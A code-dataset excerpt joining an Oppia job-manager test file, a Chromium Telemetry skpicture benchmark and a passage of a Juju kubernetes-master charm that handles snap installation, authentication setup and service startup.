jobs.STATUS_CODE_COMPLETED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'completed' status.
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
self.assertEquals(DummyJobManager.get_output(job_id), 'output')
self.assertIsNone(DummyJobManager.get_error(job_id))
def test_cancel_does_not_kill_failed_job(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertTrue(DummyFailingJobManager.is_active(job_id))
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
# Cancel the job after it has finished.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyFailingJobManager.cancel(job_id, 'admin_user_id')
# The job should still have 'failed' status.
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertEquals(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
self.assertIsNone(DummyFailingJobManager.get_output(job_id))
self.assertIn(
'raise Exception', DummyFailingJobManager.get_error(job_id))
def test_cancelling_multiple_unfinished_jobs(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel_all_unfinished_jobs('admin_user_id')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertIsNone(DummyJobManager.get_output(job2_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job2_id))
def test_cancelling_one_unfinished_job(self):
job1_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job1_id)
job2_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job2_id)
DummyJobManager.register_start(job1_id)
DummyJobManager.register_start(job2_id)
DummyJobManager.cancel(job1_id, 'admin_user_id')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
self.process_and_flush_pending_tasks()
DummyJobManager.register_completion(job2_id, 'output')
self.assertFalse(DummyJobManager.is_active(job1_id))
self.assertFalse(DummyJobManager.is_active(job2_id))
self.assertEquals(
DummyJobManager.get_status_code(job1_id),
jobs.STATUS_CODE_CANCELED)
self.assertEquals(
DummyJobManager.get_status_code(job2_id),
jobs.STATUS_CODE_COMPLETED)
self.assertIsNone(DummyJobManager.get_output(job1_id))
self.assertEquals(DummyJobManager.get_output(job2_id), 'output')
self.assertEquals(
'Canceled by admin_user_id', DummyJobManager.get_error(job1_id))
self.assertIsNone(DummyJobManager.get_error(job2_id))
SUM_MODEL_ID = 'all_data_id'
class NumbersModel(ndb.Model):
number = ndb.IntegerProperty()
class SumModel(ndb.Model):
total = ndb.IntegerProperty(default=0)
failed = ndb.BooleanProperty(default=False)
class TestDeferredJobManager(jobs.BaseDeferredJobManager):
"""Base class for testing deferred jobs."""
pass
class TestAdditionJobManager(TestDeferredJobManager):
"""Test job that sums all NumbersModel data.
The result is stored in a SumModel entity with id SUM_MODEL_ID.
"""
@classmethod
def _run(cls, additional_job_params):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
class FailingAdditionJobManager(TestDeferredJobManager):
"""Test job that stores stuff in SumModel and then fails."""
@classmethod
def _run(cls, additional_job_params):
total = sum([
numbers_model.number for numbers_model in NumbersModel.query()])
SumModel(id=SUM_MODEL_ID, total=total).put()
raise Exception('Oops, I failed.')
@classmethod
def _post_failure_hook(cls, job_id):
model = SumModel.get_by_id(SUM_MODEL_ID)
model.failed = True
model.put()
class DatastoreJobIntegrationTests(test_utils.GenericTestBase):
"""Tests the behavior of a job that affects data in the datastore.
This job gets all NumbersModel instances and sums their values, and puts
the summed values in a SumModel instance with id SUM_MODEL_ID. The
computation is redone from scratch each time the job is run.
"""
def _get_stored_total(self):
sum_model = SumModel.get_by_id(SUM_MODEL_ID)
return sum_model.total if sum_model else 0
def _populate_data(self):
"""Populate the datastore with four NumbersModel instances."""
NumbersModel(number=1).put()
NumbersModel(number=2).put()
NumbersModel(number=1).put()
NumbersModel(number=2).put()
def test_sequential_jobs(self):
self._populate_data()
self.assertEqual(self._get_stored_total(), 0)
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 6)
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_multiple_enqueued_jobs(self):
self._populate_data()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
NumbersModel(number=3).put()
TestAdditionJobManager.enqueue(
TestAdditionJobManager.create_new())
self.assertEqual(self.count_jobs_in_taskqueue(), 2)
self.process_and_flush_pending_tasks()
self.assertEqual(self._get_stored_total(), 9)
def test_failing_job(self):
self._populate_data()
job_id = FailingAdditionJobManager.create_new()
FailingAdditionJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(
taskqueue_services.PermanentTaskFailure, 'Oops, I failed'
):
self.process_and_flush_pending_tasks()
# The work that the failing job did before it failed is still done.
self.assertEqual(self._get_stored_total(), 6)
# The post-failure hook should have run.
self.assertTrue(SumModel.get_by_id(SUM_MODEL_ID).failed)
self.assertTrue(
FailingAdditionJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
class SampleMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""Test job that counts the total number of explorations."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class MapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(MapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_all_explorations(self):
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
SampleMapReduceJobManager.get_output(job_id), [['sum', 1]])
self.assertEqual(
SampleMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class JobRegistryTests(test_utils.GenericTestBase):
"""Tests job registry."""
def test_each_one_off_class_is_subclass_of_base_job_manager(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertTrue(issubclass(klass, jobs.BaseJobManager))
def test_each_one_off_class_is_not_abstract(self):
for klass in jobs_registry.ONE_OFF_JOB_MANAGERS:
self.assertFalse(klass._is_abstract()) # pylint: disable=protected-access
def test_validity_of_each_continuous_computation_class(self):
for klass in jobs_registry.ALL_CONTINUOUS_COMPUTATION_MANAGERS:
self.assertTrue(
issubclass(klass, jobs.BaseContinuousComputationManager))
event_types_listened_to = klass.get_event_types_listened_to()
self.assertTrue(isinstance(event_types_listened_to, list))
for event_type in event_types_listened_to:
self.assertTrue(isinstance(event_type, basestring))
self.assertTrue(issubclass(
event_services.Registry.get_event_class_by_type(
event_type),
event_services.BaseEventHandler))
rdc = klass._get_realtime_datastore_class() # pylint: disable=protected-access
self.assertTrue(issubclass(
rdc, jobs.BaseRealtimeDatastoreClassForContinuousComputations))
# The list of allowed base classes. This can be extended as the
# need arises, though we may also want to implement
# _get_continuous_computation_class() and
# _entity_created_before_job_queued() for other base classes
# that are added to this list.
allowed_base_batch_job_classes = [
jobs.BaseMapReduceJobManagerForContinuousComputations]
self.assertTrue(any([
issubclass(klass._get_batch_job_manager_class(), superclass) # pylint: disable=protected-access
for superclass in allowed_base_batch_job_classes]))
class JobQueriesTests(test_utils.GenericTestBase):
"""Tests queries for jobs."""
def test_get_data_for_recent_jobs(self):
self.assertEqual(jobs.get_data_for_recent_jobs(), [])
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
recent_jobs = jobs.get_data_for_recent_jobs()
self.assertEqual(len(recent_jobs), 1)
self.assertDictContainsSubset({
'id': job_id,
'status_code': jobs.STATUS_CODE_QUEUED,
'job_type': 'DummyJobManager',
'is_cancelable': True,
'error': None
}, recent_jobs[0])
class TwoClassesMapReduceJobManager(jobs.BaseMapReduceJobManager):
"""A test job handler that counts entities in two datastore classes."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel, exp_models.ExplorationRightsModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield [key, sum([int(value) for value in values])]
class TwoClassesMapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs using two classes end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(TwoClassesMapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
# Note that this ends up creating an entry in the
# ExplorationRightsModel as well.
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_entities(self):
self.assertEqual(exp_models.ExplorationModel.query().count(), 1)
self.assertEqual(exp_models.ExplorationRightsModel.query().count(), 1)
job_id = TwoClassesMapReduceJobManager.create_new()
TwoClassesMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
TwoClassesMapReduceJobManager.get_output(job_id), [['sum', 2]])
self.assertEqual(
TwoClassesMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class StartExplorationRealtimeModel(
jobs.BaseRealtimeDatastoreClassForContinuousComputations):
count = ndb.IntegerProperty(default=0)
class StartExplorationMRJobManager(
jobs.BaseMapReduceJobManagerForContinuousComputations):
@classmethod
def _get_continuous_computation_class(cls):
return StartExplorationEventCounter
@classmethod
def entity_classes_to_map_over(cls):
return [stats_models.StartExplorationEventLogEntryModel]
@staticmethod
def map(item):
current_class = StartExplorationMRJobManager
if current_class._entity_created_before_job_queued(item): # pylint: disable=protected-access
yield (item.exploration_id, {
'event_type': item.event_type,
})
@staticmethod
def reduce(key, stringified_values):
started_count = 0
for value_str in stringified_values:
value = ast.literal_eval(value_str)
if value['event_type'] == feconf.EVENT_TYPE_START_EXPLORATION:
started_count += 1
stats_models.ExplorationAnnotationsModel(
id=key, num_starts=started_count).put()
class StartExplorationEventCounter(jobs.BaseContinuousComputationManager):
"""A continuous-computation job that counts 'start exploration' events.
This class should only be used in tests.
"""
@classmethod
def get_event_types_listened_to(cls):
return [feconf.EVENT_TYPE_START_EXPLORATION]
@classmethod
def _get_realtime_datastore_class(cls):
return StartExplorationRealtimeModel
@classmethod
def _get_batch_job_manager_class(cls):
return StartExplorationMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
"""Override this method so that it does not immediately start a
new MapReduce job. Non-test subclasses should not do this."""
pass
@classmethod
def _handle_incoming_event(
cls, active_realtime_layer, event_type, exp_id, unused_exp_version,
unused_state_name, unused_session_id, unused_params,
unused_play_type):
def _increment_counter():
realtime_class = cls._get_realtime_datastore_class()
realtime_model_id = realtime_class.get_realtime_id(
active_realtime_layer, exp_id)
realtime_model = realtime_class.get(
realtime_model_id, strict=False)
if realtime_model is None:
realtime_class(
id=realtime_model_id, count=1,
realtime_layer=active_realtime_layer).put()
else:
realtime_model.count += 1
realtime_model.put()
transaction_services.run_in_transaction(_increment_counter)
# Public query method.
@classmethod
def get_count(cls, exploration_id):
"""Return the number of 'start exploration' events received.
Answers the query by combining the existing MR job output and the
active realtime_datastore_class.
"""
mr_model = stats_models.ExplorationAnnotationsModel.get(
exploration_id, strict=False)
realtime_model = cls._get_realtime_datastore_class().get(
cls.get_active_realtime_layer_id(exploration_id), strict=False)
answer = 0
if mr_model is not None:
answer += mr_model.num_starts
if realtime_model is not None:
answer += realtime_model.count
return answer
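# The query above simply adds the last completed batch result to whatever is
# sitting in the active realtime layer, e.g. (illustrative values only):
#
#   # batch model num_starts == 3, active realtime layer count == 2
#   StartExplorationEventCounter.get_count('exp_id')  # -> 5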
class ContinuousComputationTests(test_utils.GenericTestBase):
"""Tests continuous computations for 'start exploration' events."""
EXP_ID = 'exp_id'
ALL_CC_MANAGERS_FOR_TESTS = [
StartExplorationEventCounter]
def setUp(self):
"""Create an exploration and register the event listener manually."""
super(ContinuousComputationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
self.EXP_ID)
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_continuous_computation_workflow(self):
"""An integration test for continuous computations."""
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CC_MANAGERS_FOR_TESTS
):
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Record an event. This will put the event in the task queue.
event_services.StartExplorationEventHandler.record(
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
# When the task queue is flushed, the data is recorded in the two
# realtime layers.
self.process_and_flush_pending_tasks()
self.assertEqual(self.count_jobs_in_taskqueue(), 0)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
self.assertEqual(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID).count, 1)
# The batch job has not run yet, so no entity for self.EXP_ID will
# have been created in the batch model yet.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# Launch the batch computation.
StartExplorationEventCounter.start_computation()
# Data in realtime layer 0 is still there.
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
stats_models.ExplorationAnnotationsModel.get(
self.EXP_ID).num_starts, 1)
# The overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Data in realtime layer 0 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID, strict=False))
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
def test_events_coming_in_while_batch_job_is_running(self):
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CC_MANAGERS_FOR_TESTS
):
# Currently no events have been recorded.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Enqueue the batch computation. (It is running on 0 events.)
StartExplorationEventCounter._kickoff_batch_job() # pylint: disable=protected-access
# Record an event while this job is in the queue. Simulate
# this by directly calling on_incoming_event(), because using
# StartExplorationEventHandler.record() would just put the event
# in the task queue, which we don't want to flush yet.
event_services.StartExplorationEventHandler._handle_event( # pylint: disable=protected-access
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
StartExplorationEventCounter.on_incoming_event(
event_services.StartExplorationEventHandler.EVENT_TYPE,
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
# The overall count is now 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Finish the job.
self.process_and_flush_pending_tasks()
# When the batch job completes, the overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# The batch job result should still be 0, since the event arrived
# after the batch job started.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# TODO(sll): When we have some concrete ContinuousComputations running in
# production, add an integration test to ensure that the registration of event
# handlers in the main codebase is happening correctly.
| apache-2.0 | -1,856,952,554,176,331,000 | 39.608284 | 112 | 0.665676 | false |
lihui7115/ChromiumGStreamerBackend | tools/perf/benchmarks/skpicture_printer.py | 13 | 1709 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from core import perf_benchmark
from telemetry import benchmark
from telemetry.core import discover
from telemetry import story
from measurements import skpicture_printer
def _MatchPageSetName(story_set_name, story_set_base_dir):
story_sets = discover.DiscoverClasses(story_set_base_dir, story_set_base_dir,
story.StorySet).values()
for s in story_sets:
if story_set_name == s.Name():
return s
return None
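# A hedged sketch of how the helper above is used: given a page-set directory
# containing a story.StorySet subclass whose Name() returns 'top_25', the class
# itself is returned for later instantiation. The paths are illustrative:
#
#   story_set_class = _MatchPageSetName('top_25', '/path/to/page_sets')
#   story_set = story_set_class()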
@benchmark.Disabled
class SkpicturePrinter(perf_benchmark.PerfBenchmark):
@classmethod
def AddBenchmarkCommandLineArgs(cls, parser):
parser.add_option('--page-set-name', action='store', type='string')
parser.add_option('--page-set-base-dir', action='store', type='string')
parser.add_option('-s', '--skp-outdir',
help='Output directory for the SKP files')
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
if not args.page_set_name:
parser.error('Please specify --page-set-name')
if not args.page_set_base_dir:
parser.error('Please specify --page-set-base-dir')
if not args.skp_outdir:
parser.error('Please specify --skp-outdir')
@classmethod
def Name(cls):
return 'skpicture_printer'
def CreatePageTest(self, options):
return skpicture_printer.SkpicturePrinter(options.skp_outdir)
def CreateStorySet(self, options):
story_set_class = _MatchPageSetName(options.page_set_name,
options.page_set_base_dir)
return story_set_class()
| bsd-3-clause | 3,187,680,469,179,440,000 | 33.18 | 79 | 0.688122 | false |
pwittrock/reference-docs | vendor/k8s.io/kubernetes/cluster/juju/layers/kubernetes-master/reactive/kubernetes_master.py | 21 | 37137 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import os
import re
import random
import shutil
import socket
import string
import json
import ipaddress
import charms.leadership
from shlex import split
from subprocess import check_call
from subprocess import check_output
from subprocess import CalledProcessError
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import remove_state
from charms.reactive import set_state
from charms.reactive import is_state
from charms.reactive import when, when_any, when_not
from charms.reactive.helpers import data_changed, any_file_changed
from charms.kubernetes.common import get_version
from charms.kubernetes.common import retry
from charms.kubernetes.flagmanager import FlagManager
from charmhelpers.core import hookenv
from charmhelpers.core import host
from charmhelpers.core import unitdata
from charmhelpers.core.host import service_stop
from charmhelpers.core.templating import render
from charmhelpers.fetch import apt_install
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
def service_cidr():
''' Return the charm's service-cidr config '''
db = unitdata.kv()
frozen_cidr = db.get('kubernetes-master.service-cidr')
return frozen_cidr or hookenv.config('service-cidr')
def freeze_service_cidr():
''' Freeze the service CIDR. Once the apiserver has started, we can no
longer safely change this value. '''
db = unitdata.kv()
db.set('kubernetes-master.service-cidr', service_cidr())
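# Sketch of the freeze/read-back behaviour above (CIDR value illustrative):
# once frozen, later changes to the 'service-cidr' charm config are ignored.
#
#   freeze_service_cidr()   # persists e.g. '10.152.183.0/24' in unitdata
#   service_cidr()          # keeps returning the frozen value from then on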
@hook('upgrade-charm')
def reset_states_for_delivery():
    '''An upgrade charm event was triggered by Juju; react to that here.'''
migrate_from_pre_snaps()
install_snaps()
set_state('reconfigure.authentication.setup')
remove_state('authentication.setup')
def rename_file_idempotent(source, destination):
if os.path.isfile(source):
os.rename(source, destination)
def migrate_from_pre_snaps():
# remove old states
remove_state('kubernetes.components.installed')
remove_state('kubernetes.dashboard.available')
remove_state('kube-dns.available')
remove_state('kubernetes-master.app_version.set')
# disable old services
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
host.service_stop(service)
# rename auth files
os.makedirs('/root/cdk', exist_ok=True)
rename_file_idempotent('/etc/kubernetes/serviceaccount.key',
'/root/cdk/serviceaccount.key')
rename_file_idempotent('/srv/kubernetes/basic_auth.csv',
'/root/cdk/basic_auth.csv')
rename_file_idempotent('/srv/kubernetes/known_tokens.csv',
'/root/cdk/known_tokens.csv')
# cleanup old files
files = [
"/lib/systemd/system/kube-apiserver.service",
"/lib/systemd/system/kube-controller-manager.service",
"/lib/systemd/system/kube-scheduler.service",
"/etc/default/kube-defaults",
"/etc/default/kube-apiserver.defaults",
"/etc/default/kube-controller-manager.defaults",
"/etc/default/kube-scheduler.defaults",
"/srv/kubernetes",
"/home/ubuntu/kubectl",
"/usr/local/bin/kubectl",
"/usr/local/bin/kube-apiserver",
"/usr/local/bin/kube-controller-manager",
"/usr/local/bin/kube-scheduler",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
# clear the flag managers
FlagManager('kube-apiserver').destroy_all()
FlagManager('kube-controller-manager').destroy_all()
FlagManager('kube-scheduler').destroy_all()
def install_snaps():
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-apiserver snap')
snap.install('kube-apiserver', channel=channel)
hookenv.status_set('maintenance',
'Installing kube-controller-manager snap')
snap.install('kube-controller-manager', channel=channel)
hookenv.status_set('maintenance', 'Installing kube-scheduler snap')
snap.install('kube-scheduler', channel=channel)
hookenv.status_set('maintenance', 'Installing cdk-addons snap')
snap.install('cdk-addons', channel=channel)
set_state('kubernetes-master.snaps.installed')
remove_state('kubernetes-master.components.started')
@when('config.changed.channel')
def channel_changed():
install_snaps()
@when('config.changed.client_password', 'leadership.is_leader')
def password_changed():
"""Handle password change via the charms config."""
password = hookenv.config('client_password')
if password == "" and is_state('client.password.initialised'):
# password_changed is called during an upgrade. Nothing to do.
return
elif password == "":
# Password not initialised
password = token_generator()
setup_basic_auth(password, "admin", "admin")
set_state('reconfigure.authentication.setup')
remove_state('authentication.setup')
set_state('client.password.initialised')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set master configuration on the CNI relation. This lets the CNI
subordinate know that we're the master so it can respond accordingly. '''
cni.set_config(is_master=True, kubeconfig_path='')
@when('leadership.is_leader')
@when_not('authentication.setup')
def setup_leader_authentication():
'''Setup basic authentication and token access for the cluster.'''
api_opts = FlagManager('kube-apiserver')
controller_opts = FlagManager('kube-controller-manager')
service_key = '/root/cdk/serviceaccount.key'
basic_auth = '/root/cdk/basic_auth.csv'
known_tokens = '/root/cdk/known_tokens.csv'
api_opts.add('basic-auth-file', basic_auth)
api_opts.add('token-auth-file', known_tokens)
hookenv.status_set('maintenance', 'Rendering authentication templates.')
keys = [service_key, basic_auth, known_tokens]
# Try first to fetch data from an old leadership broadcast.
if not get_keys_from_leader(keys) \
or is_state('reconfigure.authentication.setup'):
last_pass = get_password('basic_auth.csv', 'admin')
setup_basic_auth(last_pass, 'admin', 'admin')
if not os.path.isfile(known_tokens):
setup_tokens(None, 'admin', 'admin')
setup_tokens(None, 'kubelet', 'kubelet')
setup_tokens(None, 'kube_proxy', 'kube_proxy')
# Generate the default service account token key
os.makedirs('/root/cdk', exist_ok=True)
if not os.path.isfile(service_key):
cmd = ['openssl', 'genrsa', '-out', service_key,
'2048']
check_call(cmd)
remove_state('reconfigure.authentication.setup')
api_opts.add('service-account-key-file', service_key)
controller_opts.add('service-account-private-key-file', service_key)
# read service account key for syndication
leader_data = {}
for f in [known_tokens, basic_auth, service_key]:
with open(f, 'r') as fp:
leader_data[f] = fp.read()
# this is slightly opaque, but we are sending file contents under its file
# path as a key.
# eg:
# {'/root/cdk/serviceaccount.key': 'RSA:2471731...'}
charms.leadership.leader_set(leader_data)
remove_state('kubernetes-master.components.started')
set_state('authentication.setup')
@when_not('leadership.is_leader')
def setup_non_leader_authentication():
service_key = '/root/cdk/serviceaccount.key'
basic_auth = '/root/cdk/basic_auth.csv'
known_tokens = '/root/cdk/known_tokens.csv'
keys = [service_key, basic_auth, known_tokens]
# The source of truth for non-leaders is the leader.
# Therefore we overwrite_local with whatever the leader has.
if not get_keys_from_leader(keys, overwrite_local=True):
# the keys were not retrieved. Non-leaders have to retry.
return
if not any_file_changed(keys) and is_state('authentication.setup'):
# No change detected and we have already setup the authentication
return
hookenv.status_set('maintenance', 'Rendering authentication templates.')
api_opts = FlagManager('kube-apiserver')
api_opts.add('basic-auth-file', basic_auth)
api_opts.add('token-auth-file', known_tokens)
api_opts.add('service-account-key-file', service_key)
controller_opts = FlagManager('kube-controller-manager')
controller_opts.add('service-account-private-key-file', service_key)
remove_state('kubernetes-master.components.started')
set_state('authentication.setup')
def get_keys_from_leader(keys, overwrite_local=False):
"""
Gets the broadcasted keys from the leader and stores them in
the corresponding files.
Args:
keys: list of keys. Keys are actually files on the FS.
    Returns: True if all keys were fetched, False if not.
"""
# This races with other codepaths, and seems to require being created first
# This block may be extracted later, but for now seems to work as intended
os.makedirs('/root/cdk', exist_ok=True)
for k in keys:
# If the path does not exist, assume we need it
if not os.path.exists(k) or overwrite_local:
# Fetch data from leadership broadcast
contents = charms.leadership.leader_get(k)
# Default to logging the warning and wait for leader data to be set
if contents is None:
msg = "Waiting on leaders crypto keys."
hookenv.status_set('waiting', msg)
hookenv.log('Missing content for file {}'.format(k))
return False
# Write out the file and move on to the next item
with open(k, 'w+') as fp:
fp.write(contents)
return True
@when('kubernetes-master.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
version = check_output(['kube-apiserver', '--version'])
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('cdk-addons.configured', 'kube-api-endpoint.available',
'kube-control.connected')
def idle_status(kube_api, kube_control):
''' Signal at the end of the run that we are running. '''
if not all_kube_system_pods_running():
hookenv.status_set('waiting', 'Waiting for kube-system pods to start')
elif hookenv.config('service-cidr') != service_cidr():
msg = 'WARN: cannot change service-cidr, still using ' + service_cidr()
hookenv.status_set('active', msg)
else:
# All services should be up and running at this point. Double-check...
failing_services = master_services_down()
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes master running.')
else:
msg = 'Stopped services: {}'.format(','.join(failing_services))
hookenv.status_set('blocked', msg)
def master_services_down():
"""Ensure master services are up and running.
Return: list of failing services"""
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not host.service_running(daemon):
failing_services.append(service)
return failing_services
@when('etcd.available', 'tls_client.server.certificate.saved',
'authentication.setup')
@when_not('kubernetes-master.components.started')
def start_master(etcd):
'''Run the Kubernetes master components.'''
hookenv.status_set('maintenance',
'Configuring the Kubernetes master services.')
freeze_service_cidr()
if not etcd.get_connection_string():
        # etcd is not returning a connection string. This happens when
# the master unit disconnects from etcd and is ready to terminate.
# No point in trying to start master services and fail. Just return.
return
handle_etcd_relation(etcd)
configure_master_services()
hookenv.status_set('maintenance',
'Starting the Kubernetes master services.')
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
for service in services:
host.service_restart('snap.%s.daemon' % service)
hookenv.open_port(6443)
set_state('kubernetes-master.components.started')
@when('etcd.available')
def etcd_data_change(etcd):
''' Etcd scale events block master reconfiguration due to the
kubernetes-master.components.started state. We need a way to
    handle these events consistently only when the number of etcd
units has actually changed '''
# key off of the connection string
connection_string = etcd.get_connection_string()
# If the connection string changes, remove the started state to trigger
# handling of the master components
if data_changed('etcd-connect', connection_string):
remove_state('kubernetes-master.components.started')
@when('kube-control.connected')
@when('cdk-addons.configured')
def send_cluster_dns_detail(kube_control):
''' Send cluster DNS info '''
# Note that the DNS server doesn't necessarily exist at this point. We know
# where we're going to put it, though, so let's send the info anyway.
dns_ip = get_dns_ip()
kube_control.set_dns(53, hookenv.config('dns_domain'), dns_ip)
@when('kube-control.auth.requested')
